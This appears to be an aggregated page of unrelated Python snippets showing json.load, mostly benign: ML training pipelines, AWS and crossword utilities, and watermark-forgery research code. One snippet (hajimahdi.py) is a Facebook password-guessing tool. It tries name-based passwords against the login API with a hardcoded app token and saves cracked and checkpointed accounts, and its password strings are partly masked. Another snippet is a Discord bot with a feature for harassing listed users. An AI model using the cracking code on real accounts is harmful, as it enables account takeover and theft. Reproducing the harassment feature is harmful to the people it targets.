                net_io_names['gt_centrosome']: ArrayKeys.GT_DIST_CENTROSOME,
                net_io_names['gt_golgi']: ArrayKeys.GT_DIST_GOLGI,
                net_io_names['gt_golgi_mem']: ArrayKeys.GT_DIST_GOLGI_MEM,
                net_io_names['gt_er']: ArrayKeys.GT_DIST_ER,
                net_io_names['gt_er_mem']: ArrayKeys.GT_DIST_ER_MEM,
                net_io_names['gt_mvb']: ArrayKeys.GT_DIST_MVB,
                net_io_names['gt_mvb_mem']: ArrayKeys.GT_DIST_MVB_MEM,
                net_io_names['gt_mito']: ArrayKeys.GT_DIST_MITO,
                net_io_names['gt_mito_mem']: ArrayKeys.GT_DIST_MITO_MEM,
                net_io_names['gt_lysosome']: ArrayKeys.GT_DIST_LYSOSOME,
                net_io_names['gt_lysosome_mem']: ArrayKeys.GT_DIST_LYSOSOME_MEM,
                net_io_names['w_centrosome']: ArrayKeys.SCALE_CENTROSOME,
                net_io_names['w_golgi']: ArrayKeys.SCALE_GOLGI,
                net_io_names['w_golgi_mem']: ArrayKeys.SCALE_GOLGI,
                net_io_names['w_er']: ArrayKeys.SCALE_ER,
                net_io_names['w_er_mem']: ArrayKeys.SCALE_ER,
                net_io_names['w_mvb']: ArrayKeys.SCALE_MVB,
                net_io_names['w_mvb_mem']: ArrayKeys.SCALE_MVB,
                net_io_names['w_mito']: ArrayKeys.SCALE_MITO,
                net_io_names['w_mito_mem']: ArrayKeys.SCALE_MITO,
                net_io_names['w_lysosome']: ArrayKeys.SCALE_LYSOSOME,
                net_io_names['w_lysosome_mem']: ArrayKeys.SCALE_LYSOSOME,
            },
            summary=net_io_names['summary'],
            log_dir='log',
            outputs={
                net_io_names['centrosome']: ArrayKeys.PRED_DIST_CENTROSOME,
                net_io_names['golgi']: ArrayKeys.PRED_DIST_GOLGI,
                net_io_names['golgi_mem']: ArrayKeys.PRED_DIST_GOLGI_MEM,
                net_io_names['er']: ArrayKeys.PRED_DIST_ER,
                net_io_names['er_mem']: ArrayKeys.PRED_DIST_ER_MEM,
                net_io_names['mvb']: ArrayKeys.PRED_DIST_MVB,
                net_io_names['mvb_mem']: ArrayKeys.PRED_DIST_MVB_MEM,
                net_io_names['mito']: ArrayKeys.PRED_DIST_MITO,
                net_io_names['mito_mem']: ArrayKeys.PRED_DIST_MITO_MEM,
                net_io_names['lysosome']: ArrayKeys.PRED_DIST_LYSOSOME,
                net_io_names['lysosome_mem']: ArrayKeys.PRED_DIST_LYSOSOME_MEM,
            },
            gradients={}
        ) +
        Snapshot({
                ArrayKeys.RAW:                   'volumes/raw',
                ArrayKeys.GT_LABELS:         'volumes/labels/gt_labels',

                ArrayKeys.GT_DIST_CENTROSOME:    'volumes/labels/gt_dist_centrosome',
                ArrayKeys.PRED_DIST_CENTROSOME:  'volumes/labels/pred_dist_centrosome',

                ArrayKeys.GT_DIST_GOLGI:    'volumes/labels/gt_dist_golgi',
                ArrayKeys.PRED_DIST_GOLGI:  'volumes/labels/pred_dist_golgi',

                ArrayKeys.GT_DIST_GOLGI_MEM:    'volumes/labels/gt_dist_golgi_mem',
                ArrayKeys.PRED_DIST_GOLGI_MEM:  'volumes/labels/pred_dist_golgi_mem',

                ArrayKeys.GT_DIST_ER:    'volumes/labels/gt_dist_er',
                ArrayKeys.PRED_DIST_ER:  'volumes/labels/pred_dist_er',

                ArrayKeys.GT_DIST_ER_MEM:    'volumes/labels/gt_dist_er_mem',
                ArrayKeys.PRED_DIST_ER_MEM:  'volumes/labels/pred_dist_er_mem',

                ArrayKeys.GT_DIST_MVB:    'volumes/labels/gt_dist_mvb',
                ArrayKeys.PRED_DIST_MVB:  'volumes/labels/pred_dist_mvb',

                ArrayKeys.GT_DIST_MVB_MEM:    'volumes/labels/gt_dist_mvb_mem',
                ArrayKeys.PRED_DIST_MVB_MEM:  'volumes/labels/pred_dist_mvb_mem',

                ArrayKeys.GT_DIST_MITO:    'volumes/labels/gt_dist_mito',
                ArrayKeys.PRED_DIST_MITO:  'volumes/labels/pred_dist_mito',

                ArrayKeys.GT_DIST_MITO_MEM:    'volumes/labels/gt_dist_mito_mem',
                ArrayKeys.PRED_DIST_MITO_MEM:  'volumes/labels/pred_dist_mito_mem',

                ArrayKeys.GT_DIST_LYSOSOME:    'volumes/labels/gt_dist_lysosome',
                ArrayKeys.PRED_DIST_LYSOSOME:  'volumes/labels/pred_dist_lysosome',

                ArrayKeys.GT_DIST_LYSOSOME_MEM:    'volumes/labels/gt_dist_lysosome_mem',
                ArrayKeys.PRED_DIST_LYSOSOME_MEM:  'volumes/labels/pred_dist_lysosome_mem',

            },
            every=500,
            output_filename='batch_{iteration}.hdf',
            output_dir='snapshots/',
            additional_request=snapshot_request) +

        PrintProfilingStats(every=50))


    print("Starting training...")
    with build(train_pipeline) as b:
        for i in range(max_iteration):
            b.request_batch(request)

    print("Training finished")
コード例 #36
0
import json

with open('./crossword.json') as f:
    data = json.load(f)

squares = data["squares"]

for square in squares:
    square["isPencil"] = False

with open('crossword_parsed.json', 'w') as json_f:
    json.dump(data, json_f)

# import json
# import copy

# def nonesorter(square):
# 	if not square["down"]["puzzleIndex"]:
# 		return (256, square["squareIndex"])
# 	return (square["down"]["puzzleIndex"], square["squareIndex"])

# with open('./crossword.json') as f:
# 	data = json.load(f)

# squares = data["squares"]
# currSquareIndex = 0
# currPuzzleIndex = 1

# vertical_order = sorted(squares, key=nonesorter)

# with open('crossword_sorted.json', 'w') as json_f:
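
The commented-out sorter pushes squares whose down clue has no puzzleIndex to the end by substituting a large sentinel. A small sketch of the same idea with a tuple key (field names follow the commented code, so treat them as assumptions about the crossword.json schema):

# Sort squares so that entries with a missing down puzzleIndex come last,
# breaking ties by squareIndex. Schema names are assumed from the code above.
def down_sort_key(square):
    down_index = square["down"]["puzzleIndex"]
    return (down_index is None, down_index or 0, square["squareIndex"])

vertical_order = sorted(squares, key=down_sort_key)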
コード例 #37
0

import jk_tokenizingparsing

import json






FILE_PATH = "tokenize_json.json"


textConverterMgr = jk_tokenizingparsing.TextConverterManager()
textConverterMgr.register(jk_tokenizingparsing.Convert4HexToUnicode())

with open(FILE_PATH, "r") as f:
	tokenizer = jk_tokenizingparsing.fromJSON(textConverterMgr, json.load(f))





for t in tokenizer.tokenize("{'a':123}"):
	print(t)




コード例 #38
0
#!/usr/bin/python3

import json
import boto3
import sys


with open('/opt/aws_panel/parameters.json', 'r') as json_data:
     params = json.load(json_data)

ins_details = []
instance    = {}

access_id   = params.get('access_token').strip()
secret_key  = params.get('secret_token').strip()
#aws_region  = params.get('aws_region_name').strip()
# print (sys.argv[1])
aws_region  = sys.argv[1]


ec2client   = boto3.client('ec2',
                  aws_access_key_id=access_id,
                  aws_secret_access_key=secret_key,
                  region_name=aws_region,)

response    = ec2client.describe_instances()

for instance_data in response["Reservations"]:
    volumes                              =  []
    instance                             =  {}
    if instance_data.get('Instances')[0].get('State').get('Name') == 'terminated':
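
The example is cut off inside the loop over reservations. As a rough, hypothetical continuation (the keys used are standard fields of describe_instances responses, but which details the original script collects is an assumption):

# Hypothetical continuation: skip terminated instances and collect basics.
for instance_data in response["Reservations"]:
    inst = instance_data["Instances"][0]
    if inst["State"]["Name"] == "terminated":
        continue
    ins_details.append({
        "id": inst["InstanceId"],
        "type": inst["InstanceType"],
        "state": inst["State"]["Name"],
    })

print(json.dumps(ins_details, indent=2))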
コード例 #39
0
def run_maximize(rep=1, flipperc=0, arch='alexnet', dataset='cifar10', scheme=1,
                 loadpath='', passport_config=''):
    epochs = 100
    batch_size = 64
    nclass = 100 if dataset == 'cifar100' else 10
    inchan = 3
    lr = 0.01
    device = torch.device('cuda')

    trainloader, valloader = prepare_dataset({'transfer_learning': False,
                                              'dataset': dataset,
                                              'tl_dataset': '',
                                              'batch_size': batch_size})

    passport_kwargs = construct_passport_kwargs_from_dict({'passport_config': json.load(open(passport_config)),
                                                           'norm_type': 'bn',
                                                           'sl_ratio': 0.1,
                                                           'key_type': 'shuffle'})

    if scheme == 1:
        model = AlexNetPassport(inchan, nclass, passport_kwargs)
    elif scheme == 2:
        model = AlexNetPassportPrivate(inchan, nclass, passport_kwargs)
    else:
        model = AlexNetPassportPrivate(inchan, nclass, passport_kwargs)

    sd = torch.load(loadpath)
    model.load_state_dict(sd, strict=False)

    for fidx in [0, 2]:
        model.features[fidx].bn.weight.data.copy_(sd[f'features.{fidx}.scale'])
        model.features[fidx].bn.bias.data.copy_(sd[f'features.{fidx}.bias'])

    for param in model.parameters():
        param.requires_grad_(False)

    passblocks = []
    origpassport = []
    fakepassport = []

    for m in model.modules():
        if isinstance(m, PassportBlock) or isinstance(m, PassportPrivateBlock):
            passblocks.append(m)

            if scheme == 1:
                keyname = 'key'
                skeyname = 'skey'
            else:
                keyname = 'key_private'
                skeyname = 'skey_private'

            key, skey = m.__getattr__(keyname).data.clone(), m.__getattr__(skeyname).data.clone()
            origpassport.append(key.to(device))
            origpassport.append(skey.to(device))

            m.__delattr__(keyname)
            m.__delattr__(skeyname)

            m.register_parameter(keyname, nn.Parameter(key.clone() + torch.randn(*key.size()) * 0.001))
            m.register_parameter(skeyname, nn.Parameter(skey.clone() + torch.randn(*skey.size()) * 0.001))
            fakepassport.append(m.__getattr__(keyname))
            fakepassport.append(m.__getattr__(skeyname))

    if flipperc != 0:
        print(f'Reverse {flipperc * 100:.2f}% of binary signature')
        for m in passblocks:
            mflip = flipperc
            if scheme == 1:
                oldb = m.sign_loss.b
            else:
                oldb = m.sign_loss_private.b
            newb = oldb.clone()

            npidx = np.arange(len(oldb))
            randsize = int(oldb.view(-1).size(0) * mflip)
            randomidx = np.random.choice(npidx, randsize, replace=False)

            newb[randomidx] = oldb[randomidx] * -1  # reverse bit
            if scheme == 1:
                m.sign_loss.set_b(newb)
            else:
                m.sign_loss_private.set_b(newb)

    model.to(device)

    optimizer = torch.optim.SGD(fakepassport,
                                lr=lr,
                                momentum=0.9,
                                weight_decay=0.0005)
    # scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,
    #                                                  [int(epochs * 0.5), int(epochs * 0.75)],
    #                                                  0.1)
    scheduler = None
    criterion = nn.CrossEntropyLoss()

    history = []

    os.makedirs('logs/passport_attack_3', exist_ok=True)

    def run_cs():
        cs = []

        for d1, d2 in zip(origpassport, fakepassport):
            d1 = d1.view(d1.size(0), -1)
            d2 = d2.view(d2.size(0), -1)

            cs.append(F.cosine_similarity(d1, d2).item())

        return cs

    print('Before training')
    res = {}
    valres = test(model, criterion, valloader, device, scheme)
    for key in valres: res[f'valid_{key}'] = valres[key]
    with torch.no_grad():
        cs = run_cs()

        mseloss = 0
        for l, r in zip(origpassport, fakepassport):
            mse = F.mse_loss(l, r)
            mseloss += mse.item()
        mseloss /= len(origpassport)

    print(f'MSE of Real and Maximize passport: {mseloss:.4f}')
    print(f'Cosine Similarity of Real and Maximize passport: {sum(cs) / len(origpassport):.4f}')
    print()

    res['epoch'] = 0
    res['cosine_similarity'] = cs
    res['flipperc'] = flipperc
    res['train_mseloss'] = mseloss

    history.append(res)

    torch.save({'origpassport': origpassport,
                'fakepassport': fakepassport,
                'state_dict': model.state_dict()},
               f'logs/passport_attack_3_epochs/{arch}-{scheme}-last-{dataset}-{rep}-{flipperc:.1f}-e0.pth')

    for ep in range(1, epochs + 1):
        if scheduler is not None:
            scheduler.step()

        print(f'Learning rate: {optimizer.param_groups[0]["lr"]}')
        print(f'Epoch {ep:3d}:')
        print('Training')
        trainres = train_maximize(origpassport, fakepassport, model, optimizer, criterion, trainloader, device, scheme)

        print('Testing')
        valres = test(model, criterion, valloader, device, scheme)

        res = {}

        for key in trainres: res[f'train_{key}'] = trainres[key]
        for key in valres: res[f'valid_{key}'] = valres[key]
        res['epoch'] = ep
        res['flipperc'] = flipperc

        with torch.no_grad():
            cs = run_cs()
            res['cosine_similarity'] = cs

        print(f'Cosine Similarity of Real and Maximize passport: '
              f'{sum(cs) / len(origpassport):.4f}')
        print()

        history.append(res)

        torch.save({'origpassport': origpassport,
                    'fakepassport': fakepassport,
                    'state_dict': model.state_dict()},
                   f'logs/passport_attack_3/{arch}-{scheme}-last-{dataset}-{rep}-{flipperc:.1f}-e{ep}.pth')

    histdf = pd.DataFrame(history)
    histdf.to_csv(f'logs/passport_attack_3/{arch}-{scheme}-history-{dataset}-{rep}-{flipperc:.1f}.csv')
コード例 #40
0
ファイル: dx.py プロジェクト: ruchim/pytest-wdl
    def run_workflow(
        self,
        wdl_path: Path,
        inputs: Optional[dict] = None,
        expected: Optional[dict] = None,
        **kwargs
    ) -> dict:
        # TODO: handle "task_name" kwarg - run app instead of workflow
        wdl_doc = parse_wdl(wdl_path, self._import_dirs, **kwargs)

        if not wdl_doc.workflow:
            raise ValueError(
                "Currently, the dxWDL executor only supports executing "
                "workflows, not individual tasks"
            )

        workflow_name = wdl_doc.workflow.name

        if (
            "workflow_name" in kwargs
            and workflow_name != kwargs["workflow_name"]
        ):
            raise ValueError(
                f"The workflow name '{workflow_name}' does not match the value "
                f"of the 'workflow_name' parameter '{kwargs['workflow_name']}'"
            )

        namespace = kwargs.get("stage_id", "stage-common")
        inputs_dict = None

        if "inputs_file" in kwargs:
            inputs_file = ensure_path(kwargs["inputs_file"])

            if inputs_file.exists():
                with open(inputs_file, "rt") as inp:
                    inputs_dict = json.load(inp)

        if not inputs_dict:
            workflow_inputs = wdl_doc.workflow.available_inputs

            if workflow_inputs:
                dx_inputs_formatter = DxInputsFormatter(wdl_doc, **kwargs)
                inputs_dict = dx_inputs_formatter.format_inputs(inputs, namespace)
            else:
                inputs_dict = {}

        try:
            with login():
                workflow = self._resolve_workflow(wdl_path, workflow_name, kwargs)
                analysis = workflow.run(inputs_dict)

                try:
                    analysis.wait_on_done()

                    expected_keys = expected.keys() if expected else []
                    outputs = self._get_analysis_outputs(analysis, expected_keys)

                    if expected:
                        self._validate_outputs(outputs, expected, OUTPUT_STAGE)

                    return outputs
                except dxpy.exceptions.DXJobFailureError:
                    raise ExecutionFailedError(
                        "dxWDL",
                        workflow_name,
                        analysis.describe()["state"],
                        inputs_dict,
                        **self._get_failed_task(analysis)
                    )
                finally:
                    if self._cleanup_cache:
                        shutil.rmtree(self._dxwdl_cache_dir)
        except dxpy.exceptions.InvalidAuthentication as ierr:
            raise ExecutorError("dxwdl", "Invalid DNAnexus credentials/token") from ierr
        except dxpy.exceptions.ResourceNotFound as rerr:
            raise ExecutorError("dxwdl", "Required resource was not found") from rerr
        except dxpy.exceptions.PermissionDenied as perr:
            raise ExecutorError(
                "dxwdl", f"You must have at least CONTRIBUTE permission"
            ) from perr
コード例 #41
0
def load_from_json_file(filename):
    """ creates an Object from a JSON file """
    with open(filename, 'r', encoding='utf8') as f:
        obj = json.load(f)
        return obj
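
For completeness, the usual json.dump counterpart is a matching writer; the helper below is a hedged sketch and not part of the example above:

def save_to_json_file(my_obj, filename):
    """ writes an Object to a text file, using a JSON representation """
    with open(filename, 'w', encoding='utf8') as f:
        json.dump(my_obj, f)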
コード例 #42
0
    sys.exit(1)

if len(sys.argv) < 2:
    print_usage()

url = sys.argv[1]
if not url.startswith('https://vgmdb.net/album/'):
    print_usage()
album_id = int(url[len('https://vgmdb.net/album/'):])

#TODO Using this json api seems to exclude certain scans.
# In particular, it normally excludes all booklet pages, Obi, and Tray.
# Consider scraping HTML instead to actually get every scan.
jso_url = 'https://vgmdb.info/album/%d?format=json' % album_id
req = urllib.request.urlopen(jso_url)
jso = json.load(req)
print(jso['name'])

track_languages = set()
tracks = []
max_track_digits = 2
disc_digits = math.ceil(math.log10(len(jso['discs'])))
multi_disc = len(jso['discs']) > 1
for disc in jso['discs']:
    max_track_digits = max(max_track_digits, math.ceil(math.log10(len(disc['tracks']))))
for disc_idx, disc in enumerate(jso['discs']):
    disc_num = str(disc_idx + 1).zfill(disc_digits)
    disc_track_digits = max(2, math.ceil(math.log10(len(disc['tracks']))))
    for track_idx, track in enumerate(disc['tracks']):
        track_num = str(track_idx + 1).zfill(disc_track_digits)
        track_languages |= track['names'].keys()
コード例 #43
0
def get_json(url):
    try:
        return json.load(urllib2.urlopen(url))
    except urllib2.HTTPError as e:
        print "Unable to fetch URL, exiting: %s" % url
        sys.exit(-1)
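
This helper is Python 2 (urllib2 and the print statement). A rough Python 3 equivalent using only the standard library could look like this:

import json
import sys
import urllib.error
import urllib.request


def get_json_py3(url):
    # json.load accepts the file-like HTTP response directly (Python 3.6+).
    try:
        with urllib.request.urlopen(url) as resp:
            return json.load(resp)
    except urllib.error.HTTPError:
        print("Unable to fetch URL, exiting: %s" % url)
        sys.exit(-1)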
コード例 #44
0
ファイル: LedStripSetup.py プロジェクト: ITTech24/LedStrip
 def loadSettings(self):
     exist = os.path.isfile("settings.json")
     if exist:
         with open("settings.json") as f:
             data = json.load(f)
             self.redPin = data["redPin"]
コード例 #45
0
#by Lucas and Siddhant

import json
import csv
from pprint import pprint

with open('superheroes.json', 'r') as f:
    superheroes=json.load(f)

# Creates an empty list called powers
powers = []

# Loop through the members of the squad and
# append the powers of each to the powers list.
members = superheroes['members']

for hero in members:
	hero_powers= hero['powers']
	powers.append(hero_powers)

# Prints those powers to the terminal
pprint(powers)

with open('superheroes.csv', 'w') as f:
    writer = csv.writer(f)
    #writing the header
    writer.writerow(['name', 'age', 'secretIdentity', 'powers', 'squadName', 'homeTown', 'formed', 'secretBase', 'active'])
    members = superheroes ['members']
    for hero in members:
    	hero_name = hero['name']
    	hero_age = hero['age']
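
The example is cut off mid-loop. A self-contained sketch of the CSV writing it appears to be heading toward (the per-hero fields match the header row above; the squad-level keys are assumptions about the superheroes.json schema):

import csv
import json

with open('superheroes.json', 'r') as f:
    superheroes = json.load(f)

with open('superheroes.csv', 'w', newline='') as f:
    writer = csv.writer(f)
    writer.writerow(['name', 'age', 'secretIdentity', 'powers',
                     'squadName', 'homeTown', 'formed', 'secretBase', 'active'])
    for hero in superheroes['members']:
        writer.writerow([
            hero['name'], hero['age'], hero['secretIdentity'],
            '; '.join(hero['powers']),
            superheroes.get('squadName'), superheroes.get('homeTown'),
            superheroes.get('formed'), superheroes.get('secretBase'),
            superheroes.get('active'),
        ])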
コード例 #46
0
def GetLinkfromElement(text, driver):
    return WebDriverWait(driver, 10).until(
        EC.presence_of_element_located((By.LINK_TEXT, text))
    ).get_attribute('href')

def GetElementByXPATH(xpath, driver):
    return WebDriverWait(driver, 10).until(
        EC.presence_of_element_located((By.XPATH, xpath))
    )

if __name__ == "__main__":
    # People to register
    try:
        registrants_json_file = "{}/registrants.json".format(dirname(abspath(__file__)))
        Registrants =  json.load(open(registrants_json_file))['registrants']
    except:
        print('''
                Failed to load registrants.json file. Please make sure this .json file exists to continue!
                #################################################################################
                # FOLLOW THE EXAMPLE BELOW FOR PERSONAL INFO FORMAT in the registrants.json file
                # (only update the value of the attributes):
                # {
                #     "catagory": "men or women",
                #     "timeslot": "timeslot",
                #     "firstname": "firstname",
                #     "lastname": "lastname",
                #     "email": "email to get tickets",
                #     "phone": "0000000000"
                # }
                #################################################################################
コード例 #47
0
ファイル: hajimahdi.py プロジェクト: kingelyas2020/shahely
	def main(arg):
		global cekpoint,oks
		user = arg
		try:
			os.mkdir('out')
		except OSError:
			pass 
		try:
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
			b = json.loads(a.text)
			pass1 = b['first_name'] + '786'
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			q = json.load(data)
			if 'access_token' in q:
				print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;92m | \x1b[1;92m ' + pass1 + ' 👽 ' + b['name']
				oks.append(user+pass1)
			else:
				if 'www.facebook.com' in q["error_msg"]:
					print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass1 + ' 👽 ' + b['name']
					cek = open("out/CP.txt", "a")
					cek.write(user+"|"+pass1+"\n")
					cek.close()
					cekpoint.append(user+pass1)
				else:
					pass2 = b['first_name'] + '123'
					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					q = json.load(data)
					if 'access_token' in q:
						print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;92m | \x1b[1;92m ' + pass2 + ' 👽 ' + b['name']
						oks.append(user+pass2)
					else:
						if 'www.facebook.com' in q["error_msg"]:
							print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass2 + ' 👽 ' + b['name']
							cek = open("out/CP.txt", "a")
							cek.write(user+"|"+pass2+"\n")
							cek.close()
							cekpoint.append(user+pass2)
						else:
							pass3 = b['first_name'] + '12345'
							data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
							q = json.load(data)
							if 'access_token' in q:
								print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;92m | \x1b[1;92m ' + pass3 + ' 👽 ' + b['name']
								oks.append(user+pass3)
							else:
								if 'www.facebook.com' in q["error_msg"]:
									print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass3 + ' 👽 ' + b['name']
									cek = open("out/CP.txt", "a")
									cek.write(user+"|"+pass3+"\n")
									cek.close()
									cekpoint.append(user+pass4)
								else:
									pass4 = b['first_name'] + '1234'
									data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
									q = json.load(data)
									if 'access_token' in q:
										print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;92m | \x1b[1;92m ' + pass4 + ' 👽 ' + b['name']
										oks.append(user+pass4)
									else:
										if 'www.facebook.com' in q["error_msg"]:
											print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass4 + ' 👽 ' + b['name']
											cek = open("out/CP.txt", "a")
											cek.write(user+"|"+pass4+"\n")
											cek.close()
											cekpoint.append(user+pass4)
										else:
											pass5 = '786786'
											data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
											q = json.load(data)
											if 'access_token' in q:
												print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;36;40m|\x1b[1;92m ' + pass5 + ' 👽 ' + b['name']
												oks.append(user+pass5)
											else:
												if 'www.facebook.com' in q["error_msg"]:
													print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass5 + ' 👽 ' + b['name']
													cek = open("out/CP.txt", "a")
													cek.write(user+"|"+pass5+"\n")
													cek.close()
													cekpoint.append(user+pass5)
												else:
													pass6 = b['last_name'] + '123'
													data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
													q = json.load(data)
													if 'access_token' in q:
														print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;36;40m|\x1b[1;92m ' + pass6 + ' 👽 ' + b['name']
														oks.append(user+pass6)
													else:
														if 'www.facebook.com' in q["error_msg"]:
															print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass6 + ' 👽 ' + b['name']
															cek = open("out/CP.txt", "a")
															cek.write(user+"|"+pass6+"\n")
															cek.close()
															cekpoint.append(user+pass6)
														else:
															pass7 = 'Pakistan'
															data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
															q = json.load(data)
															if 'access_token' in q:
																print '\x1b[1;92m[OK] \x1b[1;92m ' + user  + ' \x1b[1;36;40m|\x1b[1;92m ' + pass7 + ' 👽 ' + b['name']
																oks.append(user+pass7)
															else:
																if 'www.facebook.com' in q["error_msg"]:
																	print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user  + ' \x1b[1;36;40m|\x1b[1;97m ' + pass7 + ' 👽 ' + b['name']
																	cek = open("out/CP.txt", "a")
																	cek.write(user+"|"+pass7+"\n")
																	cek.close()
																	cekpoint.append(user+pass7)
		except:																		
			pass
コード例 #48
0
    async def on_message(self, message):
        '''
        Bad words filtering
        Checks whether any word contained in the message is in the list of
        dirty words.
        If so, the bot deletes the message and sends a reminder
        as a response.
        '''
        if message.author.bot:
            return

        mentionUser = message.author.mention
        responseList = [
            f'{mentionUser} Please keep it clean bro',
            f'{mentionUser} Did your mom not raise you properly bro?',
            f'{mentionUser} I\'m calling the police on you bro'
        ]

        with open('txt/dirtywords.txt', 'r') as fp:
            dirtywords = fp.read().splitlines()

        for word in message.content.split():

            if word.lower() in dirtywords:
                await message.delete()
                await message.channel.send(responseList[randint(
                    0,
                    len(responseList) - 1)],
                                           delete_after=10)
        '''
        Checks whether the user who wrote a message is in the "people to harass"
        list. If so, the bot will respond with a harassment message.
        '''
        with open('txt/peopletoharass.txt', 'r') as fp:
            harassUserList = fp.read().splitlines()

        with open('txt/harassmentreponses.txt', 'r') as fp:
            harassmentResponses = fp.read().splitlines()

        if str(message.author) in harassUserList:
            try:
                randNum = randint(0, len(harassmentResponses) - 1)

                await message.channel.send(
                    f'{message.author.mention} {harassmentResponses[randNum]}')

                if randNum == 6:
                    sleep(5)
                    await message.channel.send(
                        f'{message.author.mention} Sike, b*tch')
                else:
                    pass

            except IndexError:
                print(
                    'Harassment response empty. Fill in the "harassmentreponses.txt"'
                )
        '''
        Level up system
        Adds experience points every time a user sends a message
        in the server and assigns them a level when they reach a
        certain experience point threshold.
        '''
        try:
            with open('json/userxp.json') as fp:
                users = json.load(fp)

            users['users'][str(message.author.id)] += 1

            with open('json/userxp.json', 'w') as fileToDump:
                json.dump(users, fileToDump, indent=4)

            authorXP = users['users'][str(message.author.id)]

            if authorXP == 10:
                role = discord.utils.get(message.guild.roles,
                                         id=638181731794681866)
                await message.author.add_roles(role)
                await message.channel.send(
                    self.levelUpAnnouncement(message.author.mention,
                                             role.name))
            elif authorXP == 30:
                role = discord.utils.get(message.guild.roles,
                                         id=638181995909873694)
                await message.author.add_roles(role)
                await message.channel.send(
                    self.levelUpAnnouncement(message.author.mention,
                                             role.name))
            elif authorXP == 90:
                role = discord.utils.get(message.guild.roles,
                                         id=638182182136840202)
                await message.author.add_roles(role)
                await message.channel.send(
                    self.levelUpAnnouncement(message.author.mention,
                                             role.name))
            elif authorXP == 270:
                role = discord.utils.get(message.guild.roles,
                                         id=638182260264403024)
                await message.author.add_roles(role)
                await message.channel.send(
                    self.levelUpAnnouncement(message.author.mention,
                                             role.name))
            elif authorXP == 810:
                role = discord.utils.get(message.guild.roles,
                                         id=638182302408769571)
                await message.author.add_roles(role)
                await message.channel.send(
                    self.levelUpAnnouncement(message.author.mention,
                                             role.name))

        except:
            pass
        '''
        This block of code sends a motivational message 
        to encourage you to get a girlfriend/boyfriend 
        if the bot receives a Direct Message from anyone.
        '''
        if message.channel.type == discord.ChannelType.private:
            DMresponses = [
                'Get a girlfriend bro (or boyfriend).', 'I have a boyfriend',
                'I\'m already committed to someone. Find someone else.'
            ]
            await message.author.send(DMresponses[randint(
                0,
                len(DMresponses) - 1)])
            return
        else:
            pass
        '''
        Logs all the messages sent.
        '''
        log = f'{message.channel}: ({self.currentTime}) {message.author}: {message.content}'
        print(log)
        with open(f'logs/{self.currentDate}.txt', 'a') as fpAppend:
            fpAppend.write(f'{log}\n')
コード例 #49
0
ファイル: streamer.py プロジェクト: jpa99/TwitterBotProject
def load_directory():
    # directory will be the first entry
    with open(TwitterBotProjectPath + '/config.json') as json_data_file:
        data = json.load(json_data_file)
        return data
コード例 #50
0
def main():
  usage = 'usage: %prog [options] <params_file> <model_file> <data_dir>'
  parser = OptionParser(usage)
  parser.add_option('-o', dest='out_dir',
      default='test_out',
      help='Output directory for test statistics [Default: %default]')
  parser.add_option('--rc', dest='rc',
      default=False, action='store_true',
      help='Average the fwd and rc predictions [Default: %default]')
  parser.add_option('--save', dest='save',
      default=False, action='store_true',
      help='Save targets and predictions numpy arrays [Default: %default]')
  parser.add_option('--shifts', dest='shifts',
      default='0',
      help='Ensemble prediction shifts [Default: %default]')
  parser.add_option('-t', dest='targets_file',
      default=None, type='str',
      help='File specifying target indexes and labels in table format')
  parser.add_option('--split', dest='split_label',
      default='test',
      help='Dataset split label, e.g. for the TFR pattern [Default: %default]')
  parser.add_option('--tfr', dest='tfr_pattern',
      default=None,
